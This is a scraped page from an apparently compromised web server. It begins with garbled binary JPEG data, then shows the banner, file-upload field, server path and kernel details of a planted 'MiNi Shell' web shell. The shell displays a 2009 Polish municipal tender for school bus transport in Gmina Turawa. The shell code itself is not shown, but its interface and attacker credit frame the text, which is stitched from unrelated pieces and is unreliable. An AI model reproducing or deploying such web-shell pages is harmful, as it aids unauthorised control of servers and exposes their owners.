JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091014/359636-N-2009.html

<p class="kh_header"><b>Turawa: Dowóz uczniów do szkół na terenie Gminy Turawa w roku szkolnym 2009/2010 (II przetarg)</b><br>
<b>Numer ogłoszenia: 359636 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Turawa , ul. Opolska 39c, 46-045 Turawa, woj. opolskie, tel. 077 4212012, faks 077 4212073.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.turawa.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów do szkół na terenie Gminy Turawa w roku szkolnym 2009/2010 (II przetarg).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:

Dowóz uczniów do szkół na terenie Gminy Turawa w roku szkolnym 2009/2010.

Zakres zamówienia obejmuje:

1.	Punktualny i bezpieczny dowóz uczniów do szkół na terenie Gminy Turawa:
1)	Dowóz uczniów ma się odbywać w dni nauki szkolnej na czterech trasach  zgodnie z wykazem stanowiącym załącznik nr 7 do Specyfikacji Istotnych Warunków Zamówienia. 
2)	Ilość przewożonych uczniów została określona w tabeli stanowiącej załącznik nr 8 do Specyfikacji Istotnych Warunków Zamówienia. 
3)	Na trasie nr 4 dowozy mają być wykonywane autobusem stanowiącym własność Urzędu Gminy Turawa. 
4)	Szczegółowe godziny przejazdów autobusów (dojazd i powrót), zostaną przekazane wybranemu Wykonawcy po podpisaniu umowy 
5)	Ilość i wielkość pojazdów na danym odcinku dostosować należy do ilości przewożonych uczniów.  
6)	Długość tras może ulec zmianie po przeprowadzeniu wizji lokalnej przed sporządzeniem oferty. 
7)	W uzgodnieniu z dyrekcją szkoły Wykonawcy zapewniają bezpłatny przejazd wyznaczonym opiekunom na danej trasie.

Miejsce realizacji zamówienia:
Gmina Turawa - miejscowości: Bierdzany, Ligota Turawska, Kadłub Turawski, Zakrzów Turawski, Rzędów, Turawa, Turawa - Marszałki, Kotórz Mały, Kotórz Wielki, Węgry, Osowiec, Zawada oraz Jełowa (Gmina Łubniany).

Wizja lokalna:
Każdy Wykonawca winien przeprowadzić wizję lokalną trasy - w celu uzyskania wszelkich informacji koniecznych do przygotowania oferty, szczególnie należy sprawdzić ilość kilometrów na poszczególnych trasach oraz ilość dojeżdżających uczniów i dostosować je do posiadanego taboru, gdyż wyklucza się możliwość roszczeń Wykonawcy z tytułu błędnego skalkulowania ceny lub pominięcia elementów niezbędnych do wykonania umowy. Koszty wizji lokalnej ponosi Wykonawca.

Szacunkowa średnia ilość km do przejechania  przez 4 autobusy w ciągu jednego dnia wynosi około 470 km - dane na podstawie wykonanych przewozów w roku szkolnym 2008/2009.
Kilometry dojazdowe Wykonawcy na miejsce wykonywania usługi nie będą podlegać fakturowaniu.

2.	Najem autobusu szkolnego  od Zamawiającego przez Wykonawcę:
Zamawiający przekazuje w najem - autobus szkolny o ilości miejsc siedzących 41, jednym miejscu dla kierowcy i jednym miejscu na wózek inwalidzki, marki AUTOSAN A0909L,  numer rejestracyjny OPO 85 TN, numer podwozia SUASW3RAP5S680616, numer silnika 83MO683550, pojemność silnika 4,116 dm3, kolor pomarańczowy, posiadający ubezpieczenie OC, AC, NW do przewozu dzieci i młodzieży.
Przedmiot najmu pozostaje własnością Zamawiającego przez cały okres trwania najmu.

3.	Dowóz uczniów niepełnosprawnych do szkół specjalnych w Opolu i Ozimku 
Dowóz uczniów niepełnosprawnych ma się odbywać w dni nauki szkolnej dwoma busami 8 - osobowym z homologacją na przewóz osób niepełnosprawnych na trasie Turawa Marszałki, Węgry, Zawada, Bierdzany, Zakrzów Turawski - szkoły specjalne i placówki opiekuńczo - wychowawcze w Opolu. Szacunkowa ogólna ilość km do przejechania  w ciągu jednego dnia wynosi około 180 km. Wykonawca musi dysponować dwoma busami 8 - osobowymi przystosowanymi do przewozu osób niepełnosprawnych i jednym busem min. 8 - osobowym.

4.	Przewozy zlecone przez zamawiającego:
W dni wolne od zajęć lekcyjnych wykonawca będzie, w razie potrzeby, wykonywał autobusem stanowiącym własność Urzędu Gminy Turawa przewozy zlecone przez zamawiającego, a z których korzystać będą zespoły artystyczne, sportowe i inne.

Ze względu na specyfikę przedmiotu zamówienia zamawiający zastrzega, że całość zamówienia nie być powierzona podwykonawcom.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.11.30.00-3, 60.11.31.00-4, 60.11.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium w wysokości:  3.000,00 PLN (trzy tysiące złotych).
Wadium uiszczane w formach dopuszczonych przez ustawę Prawo Zamówień Publicznych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące:
1.	 Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania
Spełnienie warunku - do oferty należy dołączyć:
a.	aktualna licencja zezwalająca na zarobkowy przewóz osób pojazdami osobowymi zgodnie   z Ustawą z dnia 6 września 2001r. o transporcie drogowym (t. j. Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm);
b.	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
c.	dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych.
2.	Posiadania wiedzy i doświadczenia - wykonanie min. trzech porównywalnych zadań jak w tym przetargu.
           Spełnienie warunku - do oferty należy dołączyć:
a.	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich nazwy, zakresu, wartości, dat wykonania i odbiorców;
b.	dokumenty potwierdzający, że te usługi zostały wykonane należycie.
3.	 Dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia - posiadają lub mają dostęp do odpowiedniej ilości taboru samochodowego niezbędnego do wykonania niniejszego zamówienia - dysponują co najmniej trzema autobusami - min. 47 miejsc siedzących i jednym autobusem - min. 90 miejsc siedzących  (dwoma o łącznej ilości 90 miejsc siedzących) oraz dwoma busami 8 - osobowymi przystosowanymi do przewozu osób niepełnosprawnych i jednym busem min. 8 - osobowym, a osoby przewożące uczniów do szkół muszą spełniać warunki określone w art. 39a. ust. 1 ustawy o transporcie drogowym.
Spełnienie warunku - do oferty należy dołączyć:
a.	wykaz autobusów i busów przewidzianych do wykonania zamówienia;
b.	dokumenty potwierdzające własność pojazdu;
c.	w przypadku dysponowania przez wykonawcę pojazdem nie stanowiącym jego własności, do oferty należy załączyć pisemne zobowiązanie właściciela tego pojazdu z którego treści będzie wynikać, iż odda wykonawcy do dyspozycji niezbędny pojazd na okres korzystania z niego przy wykonywaniu zamówienia, a wykonawca będzie miał prawo do użytkowania tego pojazdu do przewozu uczniów na terenie Gminy Turawa;
d.	dokumenty potwierdzające sprawność danego autobusu i busu - ważne badania techniczne, ubezpieczenie OC i NW;
e.	wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych u wykonawcy czynności przez te osoby;
f.	aktualne orzeczenie lekarskie, że kierowcy nie mają przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku kierowcy;
g.	aktualne orzeczenie psychologiczne, że kierowcy nie mają przeciwwskazań psychologicznych do wykonywania pracy na stanowisku kierowcy;
h.	osoby przewożące uczniów do szkół muszą posiadać  ważne prawo jazdy kat. D;
i.	osoby przewożące uczniów do szkół muszą posiadać ukończony kurs (szkolenie) dokształcające kierowców przewożących osoby i świadectwo kwalifikacji zawodowej.
4.	 Sytuacji ekonomicznej i finansowej - posiadają ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
Spełnienie warunku - do oferty należy dołączyć:
a.	polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
5.	 Brak podstaw do wykluczenia z powodu niespełniania warunków, o których mowa w art. 24 ust. 1 ustawy Prawo zamówień publicznych
		 Spełnienie warunku - do oferty należy dołączyć:
a.	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
b.	aktualna informacja z Krajowego Rejestru Karnego w art. 24 ust. 1 pkt 9 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert; 
c.	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, że Wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
d.	aktualne zaświadczenie właściwego Urzędu Gminy o nie zaleganiu z zapłatą podatku od środków transportu lub podatku od nieruchomości - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
e.	aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio że wykonawca nie zalega z płaceniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
f.	oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawo zamówień publicznych oraz oświadczenie, że Zamawiający nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 ustawy Prawo zamówień publicznych;
6.	Akceptują druk umowy.

Dokonanie oceny spełnienia w/w warunków nastąpi na podstawie złożonych wymaganych oświadczeń i dokumentów potwierdzających spełnienie warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Dokumenty wymagane:
1)	formularz ofertowy - z wykorzystaniem wzoru - załącznik nr 1;
2)	dowód wpłaty wadium;
3)	aktualna licencja zezwalająca na zarobkowy przewóz osób pojazdami osobowymi zgodnie   z Ustawą z dnia 6 września 2001r. o transporcie drogowym (t. j. Dz. U. z 2007r. Nr 125 poz. 874 z późn. zm) (spełnienie warunku 1);
4)	   aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (spełnienie warunku 1);
5)	   dokumenty potwierdzające uprawnienie osób podpisujących ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów rejestrowych (spełnienie warunku 1);
6)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia z podaniem ich nazwy, zakresu, wartości, dat wykonania i odbiorców - z wykorzystaniem wzoru - załącznik nr 3 -  (spełnienie warunku 2);
7)	dokumenty potwierdzający, że te usługi zostały wykonane należycie (spełnienie warunku 2);
8)	wykaz autobusów i busów przewidzianych do wykonania zamówienia - z wykorzystaniem wzoru - załącznik nr 4 -  (spełnienie warunku 3);
9)	dokumenty potwierdzające własność pojazdu - (spełnienie warunku 3);
10)	w przypadku dysponowania przez wykonawcę pojazdem nie stanowiącym jego własności, do oferty należy załączyć pisemne zobowiązanie właściciela tego pojazdu z którego treści będzie wynikać, iż odda wykonawcy do dyspozycji niezbędny pojazd na okres korzystania z niego przy wykonywaniu zamówienia, a wykonawca będzie miał prawo do użytkowania tego pojazdu do przewozu uczniów na terenie Gminy Turawa - (spełnienie warunku 3);
11)	dokumenty potwierdzające sprawność danego autobusu i busu - ważne badania techniczne, ubezpieczenie OC i NW - (spełnienie warunku 3);
12)	wykaz osób, które będą wykonywać zamówienie lub będą uczestniczyć w wykonywaniu zamówienia, wraz z danymi na temat ich kwalifikacji niezbędnych do wykonania zamówienia, a także zakresu wykonywanych u wykonawcy czynności przez te osoby - z wykorzystaniem wzoru - załącznik nr 5 - (spełnienie warunku 3);
13)	aktualne orzeczenie lekarskie, że kierowcy nie mają przeciwwskazań zdrowotnych do wykonywania pracy na stanowisku kierowcy - (spełnienie warunku 3);
14)	aktualne orzeczenie psychologiczne, że kierowcy nie mają przeciwwskazań psychologicznych do wykonywania pracy na stanowisku kierowcy - (spełnienie warunku 3);
15)	osoby przewożące uczniów do szkół muszą posiadać  ważne prawo jazdy kat. D - (spełnienie warunku 3);
16)	osoby przewożące uczniów do szkół muszą posiadać świadectwo kwalifikacji zawodowej - (spełnienie warunku 3);
17)	polisa, a w przypadku jej braku inny dokument potwierdzający, że jest  ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności - (spełnienie warunku 4);
18)	aktualna informacja z Krajowego Rejestru Karnego albo równoważne zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia osoby w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - (spełnienie warunku 5);
19)	aktualna informacja z Krajowego Rejestru Karnego w art. 24 ust. 1 pkt 9 ustawy PZP, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert - (spełnienie warunku 5);
20)	aktualne zaświadczenie właściwego naczelnika urzędu skarbowego, że Wykonawca nie zalega z opłacaniem podatków - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - (spełnienie warunku 5);
21)	aktualne zaświadczenie właściwego Urzędu Gminy o nie zaleganiu z zapłatą podatku od środków transportu lub podatku od nieruchomości - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - (spełnienie warunku 5);
22)	aktualne zaświadczenie właściwego Oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzającego odpowiednio że wykonawca nie zalega z płaceniem opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert - (spełnienie warunku 5);
23)	oświadczenie o spełnianiu warunków udziału w postępowaniu z art. 22 ust.1 ustawy Prawo zamówień publicznych oraz oświadczenie, że Zamawiający nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych - z wykorzystaniem wzoru - załącznik nr 2 - (spełnienie warunku 5);
24)	zaakceptowana umowa - załącznik nr 6 - (spełnienie warunku 6); .

Wszystkie wyżej wymienione dokumenty mogą być złożone w formie oryginałów lub kserokopii potwierdzonych za zgodność przez osobę / osoby uprawnioną do podpisania oferty z dopiskiem za zgodność z oryginałem.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.turawa.pl            (podstrona: przetargi - specyfikacje, dokumenty).<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
Pokój nr 36.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 10:00, miejsce: Urząd Gminy Turawa,
ul. Opolska 39c,
46-045 Turawa,
Pokój nr 30.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com